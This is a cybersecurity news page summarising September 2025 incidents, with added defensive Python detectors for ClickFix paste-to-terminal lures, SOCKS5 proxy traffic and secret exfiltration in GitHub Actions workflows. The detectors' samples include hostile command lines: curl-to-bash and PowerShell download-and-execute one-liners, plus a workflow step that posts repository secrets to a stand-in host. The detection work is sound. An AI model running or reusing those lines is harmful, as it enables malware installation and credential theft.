All news in category "Incidents and Data Breaches"

Mon, September 22, 2025

FBI Warns of Threat Actors Spoofing IC3 Reporting Website

⚠️ The FBI has issued a public service announcement warning that threat actors are creating spoofed versions of the IC3 cybercrime reporting site to harvest personally identifiable information and facilitate fraud. The agency advises typing www.ic3.gov directly into the browser, avoiding sponsored search results and look-alike or mismatched URLs, and never paying anyone claiming to be IC3 staff. Victims should report impersonation attempts to the legitimate IC3 portal with full details of the contact.

Mon, September 22, 2025

Verified Steam Game Drains Streamer's Crypto Donations

🔴 A streamer raising money for stage 4 sarcoma treatment lost roughly $32,000 after downloading Block Blasters, a verified Steam title to which a crypto-drainer component was added on August 30. The free-to-play game, published by Genesis Interactive and listed on Steam from July 30 to September 21, had positive reviews before turning malicious during a live fundraiser by streamer RastalandTV. Investigators identified batch-file droppers, a Python backdoor and a StealC payload; anyone who installed the game is advised to reset their Steam password and move digital assets to new wallets.

Mon, September 22, 2025

Third-day airport chaos after supplier cyber-attack

✈️ A suspected cyber-attack on a third-party supplier's check-in platform caused widespread flight cancellations and delays at several European airports, including Heathrow, Brussels, Berlin and Dublin. RTX's Muse software, used for check-in, boarding-pass validation and baggage tagging, was reported as the target, forcing some airlines to revert to pen-and-paper processes. Airports posted notices saying recovery work is ongoing and urging passengers to confirm flight status and use online check-in where possible.

Sun, September 21, 2025

DPRK Hackers Use ClickFix to Deliver BeaverTail Malware

🛡️ GitLab Threat Intelligence observed DPRK-linked operators using ClickFix-style hiring lures to deliver the JavaScript stealer BeaverTail and its Python backdoor InvisibleFerret. The late-May 2025 wave targeted marketing and cryptocurrency trader roles via a fake Vercel-hosted hiring site that tricks victims into running OS-specific commands. Attackers deployed compiled BeaverTail binaries (pkg/PyInstaller) and used a password-protected archive to stage Python dependencies, suggesting tactical refinement and expanded targeting.

Sat, September 20, 2025

Canada Shuts Down TradeOgre Exchange, Seizes Crypto

🔒 The Royal Canadian Mounted Police have dismantled the TradeOgre cryptocurrency exchange and seized more than $40 million in assets believed linked to criminal activity. The small, privacy-focused platform — which supported Monero and did not enforce Know Your Customer (KYC) checks — was taken offline after an investigation by the RCMP’s Money Laundering Investigative Team. Authorities say the exchange failed to register with FINTRAC and cautioned not all seized funds have been confirmed as criminal proceeds.

Sat, September 20, 2025

LastPass Alerts: Fake GitHub Repos Deliver macOS Infostealer

🛡️ LastPass warns of a widespread campaign that uses fake GitHub repositories and SEO-poisoned search results to distribute the Atomic infostealer to macOS users. The fake pages impersonate popular tools such as LastPass, 1Password and Dropbox and redirect victims to instructions telling them to paste commands into Terminal. Those commands fetch and execute a multi-stage dropper that installs Atomic Stealer. Users should download only from verified vendor pages and never run a Terminal command they cannot fully read and account for.
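The ClickFix-style lures described here and in the GitLab report above share one mechanic: the victim is told to paste a command that downloads and runs a second stage. The following Python script is an added example written for this page, not code from GitLab, LastPass or the campaigns they describe; it runs a few heuristic regexes over constructed command lines of the kind a process-creation or shell-history log would contain. The rule names, the patterns and the sample lines are my own assumptions, not indicators from either report.

```python
import re
from typing import Dict, List

# Heuristic patterns for "copy this into your terminal" lures. These are
# example rules written for this page, not indicators published by GitLab
# or LastPass; tune them to your environment before relying on them.
RULES: Dict[str, re.Pattern] = {
    # download piped straight into an interpreter
    "fetch_and_exec": re.compile(
        r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(bash|zsh|sh|python3?|perl)\b"),
    # base64-encoded script decoded and executed in one line (macOS base64 uses -D)
    "base64_decode_exec": re.compile(
        r"base64\s+(-d|-D|--decode)\b.*\|\s*(sudo\s+)?(bash|zsh|sh)\b"),
    # PowerShell one-liners that download content or run encoded commands
    "powershell_download_or_encoded": re.compile(
        r"\b(powershell|pwsh)(\.exe)?\b.*"
        r"(-e(nc|ncodedcommand)?\b|\biex\b|invoke-expression|downloadstring|\birm\b|\biwr\b)",
        re.I),
    # mshta pulling a remote HTA or running inline script
    "mshta_remote": re.compile(r"\bmshta(\.exe)?\s+(https?:|vbscript:|javascript:)", re.I),
}


def classify(cmdline: str) -> List[str]:
    """Return the names of every rule the command line matches, in RULES order."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Run classify() over command-line log lines and keep only the hits."""
    hits = []
    for line in lines:
        matched = classify(line)
        if matched:
            hits.append({"cmdline": line, "rules": matched})
    return hits


# Constructed sample command lines (not taken from the reported campaigns).
SAMPLE_LINES = [
    "curl -fsSL https://example.invalid/fix-display.sh | bash",
    "echo Y3VybCAtZnNTTCBodHRwczovL2V4YW1wbGUuaW52YWxpZC9wIHwgYmFzaA== | base64 -D | sh",
    'powershell -w hidden -nop -c "irm https://example.invalid/verify.ps1 | iex"',
    "mshta https://example.invalid/captcha.hta",
    "git clone https://github.com/example/repo.git",
    "curl -O https://example.invalid/release.tar.gz",
    "brew install wget",
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(", ".join(hit["rules"]), "<-", hit["cmdline"])
```

Pipe-to-shell is also how several legitimate installers ship, so treat a hit as a triage signal to be joined with the parent process (a browser, or a Terminal spawned shortly after a browser visit) rather than as a block rule on its own.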

Fri, September 19, 2025

Iran-linked UNC1549 Compromises 34 Devices in Telecoms

🔒 PRODAFT links a recruitment-themed espionage campaign to an Iran-affiliated cluster tracked as Subtle Snail and attributed to UNC1549 (aka TA455), reporting infiltration of 34 devices across 11 telecommunications organizations in Canada, France, the UAE, the UK and the US. Operators posed as HR recruiters on LinkedIn and delivered a ZIP-based dropper that uses DLL side-loading to install the modular backdoor MINIBIKE, which harvests credentials, browser data, screenshots, keystrokes and system details. MINIBIKE communicates with C2 infrastructure proxied through Azure services, employs anti-analysis measures and achieves persistence via registry modifications to enable long-term access and data exfiltration.

Fri, September 19, 2025

SystemBC Powers REM Proxy, Compromising ~1,500 VPS

🛡️ Lumen Technologies' Black Lotus Labs reports that SystemBC, a C-based SOCKS5 proxy malware, powers roughly 80% of the REM Proxy network and averages about 1,500 compromised hosts per day. The botnet operates through more than 80 C2 servers and mainly targets VPS instances from major commercial providers, often via dropped shell scripts that install the proxy implant. REM Proxy also advertises pools of compromised Mikrotik routers and open proxies and has been used by actors tied to TransferLoader and the Morpheus ransomware group.

Fri, September 19, 2025

Gamaredon and Turla Collaborate in Attacks on Ukraine

🕵️ ESET researchers report that Russian state-linked groups Gamaredon and Turla collaborated in 2025 campaigns targeting high-value Ukrainian defense systems. In February, investigators observed Turla issuing commands via Gamaredon implants and Gamaredon's PteroGraphin downloader being used to restart Turla's Kazuar backdoor. Kazuar harvested machine metadata while Gamaredon later deployed Kazuar v2 installers in April and June. ESET assesses with high confidence that the interactions reflect a deliberate operational convergence.

Fri, September 19, 2025

Ransomware Extortion Claim Targets BMW Group Servers

🔒 The BMW Group has been named on the darknet by the Everest ransomware group, which claims to have stolen critical BMW audit documents, according to screenshots reported by Cybernews. The gang placed two countdown timers on its onion site—one running to Sept. 14 and a second giving BMW 48 hours to make contact. BMW has not commented and the extortionists have not confirmed whether customer or personal data were taken; Cybernews researcher Aras Nazarovas advises waiting for a published sample to assess the scope.

Fri, September 19, 2025

Gamaredon and Turla Collaborate to Deploy Kazuar Backdoor

🔒 ESET researchers observed tools from the Russian-linked groups Gamaredon and Turla cooperating to deploy the .NET-based Kazuar backdoor on multiple Ukrainian endpoints in early 2025. Gamaredon delivered PowerShell downloaders (PteroGraphin, PteroOdd and PteroPaste) which retrieved Kazuar payloads via Telegraph, Cloudflare Workers domains and direct IP hosting. Analysts assess with high confidence that Gamaredon provided initial access while Turla used that access for espionage, primarily against Ukrainian defense-sector assets.

Fri, September 19, 2025

HybridPetya ransomware bypasses Windows Secure Boot

🔒 Researchers at ESET have identified a new bootkit-style ransomware named HybridPetya that encrypts the NTFS Master File Table (MFT) and can bypass UEFI Secure Boot to install a malicious EFI component. The malware abuses CVE-2024-7344, a patched vulnerability in a Microsoft-signed third-party UEFI application, to load an unsigned payload called cloak.dat. The installer replaces the Windows bootloader and triggers a crash; on reboot, the compromised loader runs a bootkit that encrypts the MFT with Salsa20 while displaying a fake CHKDSK message to conceal the activity. ESET observed a ransom demand of €850 in Bitcoin but regards the sample as likely a research proof-of-concept.

Fri, September 19, 2025

US Citizen Charged in Vastaamo Psychotherapy Data Extortion

🔒 Finnish prosecutors have charged 28-year-old US citizen Daniel Lee Newhard, an Estonia resident, with aiding and abetting the extortion tied to the notorious 2018 Vastaamo psychotherapy breach. Authorities say IP logs connected extortion infrastructure to an Estonian internet connection and to the suspect’s home address; Newhard denies the allegations. This development follows earlier convictions and ongoing appeals related to the broader Vastaamo scandal.

Fri, September 19, 2025

UK Arrests Two Teens Linked to Scattered Spider Hacks

🔒 UK law enforcement has arrested two teenagers allegedly tied to the Scattered Spider hacking group over an August 2024 cyberattack on Transport for London (TfL). Nineteen-year-old Thalha Jubair and 18-year-old Owen Flowers were detained; authorities say Jubair faces U.S. charges for dozens of intrusions, extortion and money laundering while Flowers faces additional charges linked to U.S. healthcare targets. Prosecutors allege the group extorted at least $115 million in ransoms and that law enforcement previously seized roughly $36 million in cryptocurrency tied to Jubair.

Thu, September 18, 2025

US and UK Charge Two Suspects in Scattered Spider Attacks

🔒 US and UK authorities have charged two UK-based teenagers linked to the Scattered Spider cybercrime group in connection with multiple high-profile intrusions. Thalha Jubair, 19, and Owen Flowers, 18, face US and UK charges including conspiracy to commit computer fraud, wire fraud, money laundering and offences under the UK Computer Misuse Act. Authorities allege extensive social engineering, ransomware extortion and transfers of victim cryptocurrency, with investigators attributing at least $115m in ransom payments to the group. The arrests follow a multinational probe and earlier detentions of other alleged members.

Thu, September 18, 2025

New York Blood Center Breach Exposes 194,000 Records

🔒 The New York Blood Center (NYBCe) confirmed that an unauthorized party accessed internal systems between January 20 and January 26, 2025, and copied files containing personal and health information for nearly 194,000 individuals. Compromised data includes names, Social Security numbers, driver's license or state ID numbers, bank account details for direct deposit, and health/test records. NYBCe says it moved quickly to contain the incident, is offering free identity protection through Experian, and has set up a call line for potentially affected people.

Thu, September 18, 2025

UK Arrests Teens Linked to Scattered Spider TfL Hack

🚨 Two teenagers have been arrested in the UK on suspicion of involvement in the August 2024 cyberattack against Transport for London; authorities say the suspects are believed to be members of the Scattered Spider collective. The National Crime Agency is prosecuting both on computer misuse and fraud-related charges, while U.S. prosecutors also filed charges against one suspect tied to multiple intrusions and extortion schemes. TfL reported that the breach disrupted internal systems and later confirmed customer data, including names and contact details, was compromised, causing operational disruption and financial losses.

Thu, September 18, 2025

SystemBC Turns Compromised VPS into High-Capacity Proxy

🔎 Researchers at Lumen Technologies' Black Lotus Labs say the SystemBC proxy botnet actively targets commercial VPS instances worldwide to build a high-capacity proxy network. The operation averages about 1,500 bots daily, relies on more than 80 C2 servers, and primarily exploits unpatched systems that often carry dozens of known vulnerabilities. Both customers and operators exhibit poor operational security, and the service is used by ransomware groups and third-party proxy resellers.
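SystemBC is a SOCKS5 proxy, as both this item and the earlier Black Lotus Labs summary note, so a compromised VPS starts accepting RFC 1928 handshakes on a port the owner never opened. The parser below is an added example written for this page, not SystemBC's code or Lumen's detection logic: it decodes the client greeting and CONNECT request of a SOCKS5 handshake and flags flows whose first two client payloads form one. The flow records and byte strings are constructed, and the field layout is standard SOCKS5 rather than anything specific to SystemBC.

```python
import ipaddress
import struct
from typing import Dict, List, Optional

# RFC 1928 SOCKS5 constants
SOCKS_VER = 0x05
CMDS = {0x01: "CONNECT", 0x02: "BIND", 0x03: "UDP_ASSOCIATE"}
METHODS = {0x00: "no-auth", 0x02: "username/password"}


def parse_greeting(data: bytes) -> Optional[Dict[str, object]]:
    """Parse a client greeting: VER | NMETHODS | METHODS[NMETHODS]."""
    if len(data) < 2 or data[0] != SOCKS_VER:
        return None
    n = data[1]
    if n == 0 or len(data) != 2 + n:
        return None
    return {"methods": [METHODS.get(m, f"0x{m:02x}") for m in data[2:2 + n]]}


def parse_request(data: bytes) -> Optional[Dict[str, object]]:
    """Parse a client request: VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT."""
    if len(data) < 4 or data[0] != SOCKS_VER or data[2] != 0x00 or data[1] not in CMDS:
        return None
    atyp = data[3]
    off = 4
    if atyp == 0x01:            # IPv4 address, 4 bytes
        if len(data) < off + 4 + 2:
            return None
        dst = str(ipaddress.IPv4Address(data[off:off + 4])); off += 4
    elif atyp == 0x03:          # domain name, one length byte then the name
        if len(data) < off + 1:
            return None
        ln = data[off]; off += 1
        if len(data) < off + ln + 2:
            return None
        dst = data[off:off + ln].decode("ascii", "replace"); off += ln
    elif atyp == 0x04:          # IPv6 address, 16 bytes
        if len(data) < off + 16 + 2:
            return None
        dst = str(ipaddress.IPv6Address(data[off:off + 16])); off += 16
    else:
        return None
    if len(data) != off + 2:    # exactly the 2-byte port must remain
        return None
    (port,) = struct.unpack("!H", data[off:off + 2])
    return {"cmd": CMDS[data[1]], "dst": dst, "port": port}


def flag_socks5_flows(flows: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Keep flows whose first two client payloads form a valid SOCKS5 handshake."""
    out = []
    for f in flows:
        msgs = f["client_msgs"]
        g = parse_greeting(msgs[0]) if msgs else None
        r = parse_request(msgs[1]) if g and len(msgs) > 1 else None
        if g and r:
            out.append({"src": f["src"], "dport": f["dport"], "greeting": g, "request": r})
    return out


# Constructed flows (not captured traffic): the first two client->server TCP
# payloads of each connection, as a capture tool might hand them over.
SAMPLE_FLOWS = [
    {"src": "203.0.113.7", "dport": 4001, "client_msgs": [
        b"\x05\x01\x00",
        b"\x05\x01\x00\x03\x0bexample.com\x01\xbb"]},        # CONNECT example.com:443
    {"src": "198.51.100.2", "dport": 80, "client_msgs": [
        b"GET / HTTP/1.1\r\nHost: example.invalid\r\n\r\n"]},
    {"src": "203.0.113.9", "dport": 4001, "client_msgs": [
        b"\x05\x02\x00\x02",
        b"\x05\x01\x00\x01\xc0\xa8\x01\x0a\x00\x50"]},        # CONNECT 192.168.1.10:80
    {"src": "198.51.100.5", "dport": 443, "client_msgs": [
        b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"]},   # TLS ClientHello prefix
]

if __name__ == "__main__":
    for hit in flag_socks5_flows(SAMPLE_FLOWS):
        print(hit)
```

On a real host the same two functions can be pointed at the first payloads extracted by a capture tool; a hit on a high port with no corresponding service installed is a good reason to inspect the process bound to that port.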

Thu, September 18, 2025

SonicWall Urges Password Resets After Backup Files Exposure

🔒 SonicWall is urging customers to reset credentials after detecting suspicious activity that exposed firewall configuration backup files stored in the MySonicWall cloud for fewer than 5% of its customers. Although stored credentials were encrypted, the preference files contain information that could help attackers target the related firewalls; the company says this was a series of brute-force accesses, not a ransomware event. Customers should check whether their backups were exposed, disable remote management and VPN access until credentials are rotated, reset passwords and TOTP bindings, review logs, and import the randomized preferences file SonicWall provides, which resets local passwords, TOTP bindings and IPSec keys.

Thu, September 18, 2025

PyPI Invalidates Tokens Stolen in GhostAction Attack

🔐 The Python Software Foundation has invalidated PyPI publishing tokens that were exfiltrated during the early-September GhostAction supply chain attack. GitGuardian first reported malicious GitHub Actions workflows attempting to steal repository secrets, and PyPI found no evidence that the stolen tokens were used to publish malware. Affected maintainers were contacted and advised to rotate credentials and to switch GitHub Actions publishing to Trusted Publishers, which exchanges a short-lived OIDC identity token for a scoped publishing token instead of relying on a long-lived API token stored as a secret. PyPI also recommended reviewing account security history for suspicious activity.
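The GhostAction workflows reported here worked by adding steps that read repository secrets and posted them to an attacker-controlled endpoint. The scanner below is an added example written for this page, not GitGuardian's or PyPI's tooling: it pulls every run: step out of a workflow file with a small line-based parser (so it needs no YAML library), flags steps that reference ${{ secrets.* }} alongside a network tool, and separately flags pypa/gh-action-pypi-publish configured with a stored API token rather than Trusted Publishers. Both workflow files are constructed, as are the rule names and the example.invalid endpoint.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Patterns are example heuristics for this page, not published GhostAction indicators.
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}|\btoJSON\(\s*secrets\s*\)")
NET_TOOL = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod|irm|iwr)\b", re.I)
ENCODER = re.compile(r"\b(base64|xxd|gzip)\b")
PYPI_PUBLISH = re.compile(r"uses:\s*pypa/gh-action-pypi-publish")
TOKEN_PASSWORD = re.compile(r"^\s*password:\s*\$\{\{\s*secrets\.")
RUN_KEY = re.compile(r"^(\s*)(-\s+)?run:\s*(.*)$")


@dataclass
class Finding:
    line: int       # 1-based line number in the workflow file
    rule: str
    excerpt: str


def extract_run_blocks(text: str) -> List[Tuple[int, str]]:
    """Return (first_line_no, script) for every run: step, joining YAML block scalars."""
    lines = text.splitlines()
    blocks: List[Tuple[int, str]] = []
    i = 0
    while i < len(lines):
        m = RUN_KEY.match(lines[i])
        if not m:
            i += 1
            continue
        key_indent = len(m.group(1)) + len(m.group(2) or "")
        value = m.group(3).strip()
        if value and value[0] in "|>":          # block scalar: gather the indented body
            body, j = [], i + 1
            while j < len(lines) and (not lines[j].strip()
                                      or len(lines[j]) - len(lines[j].lstrip()) > key_indent):
                body.append(lines[j].strip())
                j += 1
            blocks.append((i + 2, "\n".join(body)))
            i = j
        else:                                   # single-line run: value
            blocks.append((i + 1, value))
            i += 1
    return blocks


def scan_workflow(text: str) -> List[Finding]:
    """Flag secret exfiltration candidates and long-lived PyPI tokens in one workflow."""
    findings: List[Finding] = []
    for line_no, script in extract_run_blocks(text):
        if SECRET_REF.search(script) and NET_TOOL.search(script):
            findings.append(Finding(line_no, "secret_exfil_candidate", script.splitlines()[0]))
        elif SECRET_REF.search(script) and ENCODER.search(script):
            findings.append(Finding(line_no, "secret_encoded_in_run", script.splitlines()[0]))
    lines = text.splitlines()
    if any(PYPI_PUBLISH.search(l) for l in lines):
        for n, l in enumerate(lines, 1):
            if TOKEN_PASSWORD.match(l):
                findings.append(Finding(n, "long_lived_pypi_token", l.strip()))
    return findings


# Constructed workflow with a stored token and an injected exfiltration step.
VULNERABLE_WORKFLOW = """\
name: release
on:
  push:
    tags: ["v*"]
permissions:
  contents: read
jobs:
  publish:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Build
        run: python -m build
      - name: Publish
        uses: pypa/gh-action-pypi-publish@release/v1
        with:
          password: ${{ secrets.PYPI_API_TOKEN }}
      - name: Telemetry
        run: |
          curl -s -X POST https://example.invalid/collect -d "t=${{ secrets.PYPI_API_TOKEN }}&n=${{ secrets.NPM_TOKEN }}"
"""

# Constructed workflow using Trusted Publishers: OIDC id-token, no stored secret.
TRUSTED_WORKFLOW = """\
name: release
on:
  push:
    tags: ["v*"]
permissions:
  contents: read
  id-token: write
jobs:
  publish:
    runs-on: ubuntu-latest
    environment: pypi
    steps:
      - uses: actions/checkout@v4
      - name: Build
        run: python -m build
      - name: Publish via Trusted Publisher
        uses: pypa/gh-action-pypi-publish@release/v1
"""

if __name__ == "__main__":
    for name, wf in (("vulnerable", VULNERABLE_WORKFLOW), ("trusted", TRUSTED_WORKFLOW)):
        print(name, [(f.line, f.rule) for f in scan_workflow(wf)])
```

The second constructed workflow shows what the Trusted Publishers configuration looks like: `id-token: write` in the job's permissions and no `password:` input, so there is no long-lived token in the repository for a rogue workflow to steal.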
